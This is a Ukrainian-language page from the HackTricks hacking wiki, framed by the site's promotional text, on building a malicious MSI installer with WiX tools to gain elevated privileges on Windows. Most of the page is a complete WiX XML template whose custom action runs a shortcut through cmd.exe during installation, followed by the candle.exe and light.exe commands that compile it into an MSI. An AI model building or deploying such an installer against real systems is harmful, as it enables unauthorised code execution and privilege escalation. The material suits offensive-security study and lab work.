Create MSI with WIX

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити рекламу вашої компанії на HackTricks або завантажити HackTricks у PDF Перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.

Створення шкідливого MSI та отримання Root

Створення установника MSI буде виконано за допомогою wixtools, зокрема буде використано wixtools. Варто зазначити, що були спроби використання альтернативних засобів створення MSI, але вони не були успішними у цьому конкретному випадку.

Для більш глибокого розуміння прикладів використання wix MSI, рекомендується звернутися до цієї сторінки. Тут ви знайдете різноманітні приклади, які демонструють використання wix MSI.

Мета полягає в створенні MSI, який виконає файл lnk. Для досягнення цієї мети можна використовувати наступний XML-код (xml звідси):

<?xml version="1.0"?>
<Wix xmlns="http://schemas.microsoft.com/wix/2006/wi">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name"
Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="product.cab" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
</Component>
</Directory>
</Directory>
</Directory>
<Feature Id="DefaultFeature" Level="1">
<ComponentRef Id="ApplicationFiles"/>
</Feature>
<Property Id="cmdline">cmd.exe /C "c:\users\public\desktop\shortcuts\rick.lnk"</Property>
<CustomAction Id="Stage1" Execute="deferred" Directory="TARGETDIR" ExeCommand='[cmdline]' Return="ignore"
Impersonate="yes"/>
<CustomAction Id="Stage2" Execute="deferred" Script="vbscript" Return="check">
fail_here
</CustomAction>
<InstallExecuteSequence>
<Custom Action="Stage1" After="InstallInitialize"></Custom>
<Custom Action="Stage2" Before="InstallFiles"></Custom>
</InstallExecuteSequence>
</Product>
</Wix>

Важливо зауважити, що елемент Package містить атрибути, такі як InstallerVersion та Compressed, які вказують версію інсталятора та показують, чи упакований пакет, відповідно.

Процес створення включає використання candle.exe, інструменту з wixtools, для генерації wixobject з msi.xml. Слід виконати наступну команду:

candle.exe -out C:\tem\wix C:\tmp\Ethereal\msi.xml

Крім того, варто зазначити, що в пості наведено зображення, яке показує команду та її вивід. Ви можете звертатися до нього для візуального керівництва.

Крім того, light.exe, ще один інструмент з wixtools, буде використаний для створення файлу MSI з wixobject. Команда, яку слід виконати, наведена нижче:

light.exe -out C:\tm\Ethereal\rick.msi C:\tmp\wix

Посилання

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Якщо ви хочете побачити вашу компанію рекламовану на HackTricks або завантажити HackTricks у форматі PDF, перевірте ПЛАНИ ПІДПИСКИ!
Отримайте офіційний PEASS & HackTricks мерч
Відкрийте для себе Сім'ю PEASS, нашу колекцію ексклюзивних NFT
Приєднуйтесь до 💬 групи Discord або групи telegram або слідкуйте за нами на Twitter 🐦 @carlospolopm.
Поділіться своїми хакерськими трюками, надсилайте PR до HackTricks та HackTricks Cloud репозиторіїв.

PreviousAppendData/AddSubdirectory permission over service registry NextCOM Hijacking

Last updated 1 month ago